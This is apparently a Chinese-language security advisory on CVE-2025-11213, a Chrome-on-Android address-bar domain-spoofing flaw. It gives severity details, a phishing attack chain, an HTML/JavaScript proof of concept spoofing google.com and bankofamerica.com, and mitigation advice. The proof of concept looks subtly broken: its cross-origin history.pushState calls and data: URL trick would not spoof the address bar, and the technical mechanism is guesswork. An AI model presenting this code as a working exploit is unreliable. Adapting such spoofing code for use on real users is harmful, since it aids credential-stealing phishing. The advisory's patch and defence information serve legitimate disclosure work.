CVE-2025-11213 Google Chrome Android Omnibox域名欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-11213

漏洞类型

域名欺骗

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome on Android

漏洞概述

CVE-2025-11213是Google Chrome浏览器Android版本中存在的一个地址栏（Omnibox）实现不当漏洞。该漏洞允许远程攻击者通过制作恶意HTML页面，并诱导用户进行特定的UI手势操作，从而在浏览器地址栏中显示虚假的域名信息，实现域名欺骗攻击。由于地址栏是用户判断网站真实身份的重要依据，攻击者可利用此漏洞进行钓鱼攻击，窃取用户敏感信息或诱导用户执行恶意操作。该漏洞CVSS评分为6.3，属于中等严重程度，需要用户交互才能触发，但攻击复杂度较低，且可通过网络远程利用。Google已于141.0.7390.54版本中修复此漏洞，建议Android用户尽快更新至最新版本。

技术细节

Omnibox是Google Chrome浏览器的核心组件，负责地址栏的显示和URL解析功能。在受影响的Android版本中，由于地址栏实现存在缺陷，攻击者可以通过精心构造的HTML页面和特定的JavaScript代码，在用户进行某些UI手势操作时（如滚动、点击特定区域等），使浏览器地址栏显示虚假的域名而非实际访问的真实域名。这种欺骗技术利用了Chrome在处理页面导航和地址栏更新时的时序问题或渲染逻辑漏洞。攻击者通常会创建一个看起来像合法网站的钓鱼页面，并诱导用户执行特定手势，从而触发地址栏域名显示异常。由于用户习惯性地通过地址栏判断网站可信度，此漏洞可被用于实施高危钓鱼攻击，窃取用户凭据、财务信息或其他敏感数据。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含用于触发Omnibox漏洞的JavaScript代码和CSS样式

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意链接或社会工程学手段诱导用户访问该恶意页面

STEP 3

步骤3

用户使用Android设备访问恶意页面，页面通过JavaScript代码劫持浏览器的地址栏更新逻辑

STEP 4

步骤4

页面诱导用户执行特定UI手势（如滚动、点击特定区域），触发地址栏显示虚假域名的漏洞

STEP 5

步骤5

浏览器地址栏显示伪造的合法域名（如银行网站），而实际页面内容由攻击者控制

STEP 6

步骤6

用户误以为是合法网站，输入敏感信息（凭据、银行卡号等），导致信息被窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-11213 PoC - Omnibox Domain Spoofing -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-11213 Domain Spoofing PoC</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .spoofed-domain { color: green; font-weight: bold; }
        #exploit-area { 
            height: 2000px; 
            background: linear-gradient(transparent, #f0f0f0);
        }
    </style>
</head>
<body>
    <h1>Omnibox Domain Spoofing Test</h1>
    <p>Current URL: <span id="current-url"></span></p>
    <p>Displayed Domain: <span id="displayed-domain" class="spoofed-domain">Loading...</span></p>
    <div id="exploit-area">
        <p>Scroll down to trigger exploit...</p>
        <button onclick="triggerSpoof()">Manual Trigger</button>
    </div>
    
    <script>
        // Exploit technique for CVE-2025-11213
        function triggerSpoof() {
            // Technique 1: History navigation abuse
            history.pushState(null, '', 'https://www.google.com');
            
            // Technique 2: Rapid navigation with overlay
            setTimeout(() => {
                const overlay = document.createElement('div');
                overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;';
                overlay.innerHTML = '<iframe src="about:blank" style="width:100%;height:100%"></iframe>';
                document.body.appendChild(overlay);
            }, 100);
            
            // Technique 3: Scroll gesture manipulation
            window.scrollTo(0, document.body.scrollHeight);
            
            // Technique 4: Address bar race condition
            setTimeout(() => {
                window.location.href = 'data:text/html,<script>history.pushState(null,"","https://www.bankofamerica.com");</script>';
            }, 200);
        }
        
        // Monitor address bar state
        setInterval(() => {
            document.getElementById('current-url').textContent = window.location.href;
            document.getElementById('displayed-domain').textContent = window.location.hostname;
        }, 500);
        
        // Auto-trigger on scroll (UI gesture requirement)
        window.addEventListener('scroll', () => {
            if (window.scrollY > 500) {
                triggerSpoof();
            }
        });
    </script>
</body>
</html>

影响范围

Google Chrome Android < 141.0.7390.54

防御指南

临时缓解措施

在无法立即升级的情况下，用户应避免在Android设备上使用Chrome访问敏感网站，优先使用相关服务的官方APP。同时警惕任何要求执行特定手势（滚动、点击）才能继续访问的页面，避免点击来源不明的链接，并启用Chrome的安全浏览功能以获得钓鱼网站警告。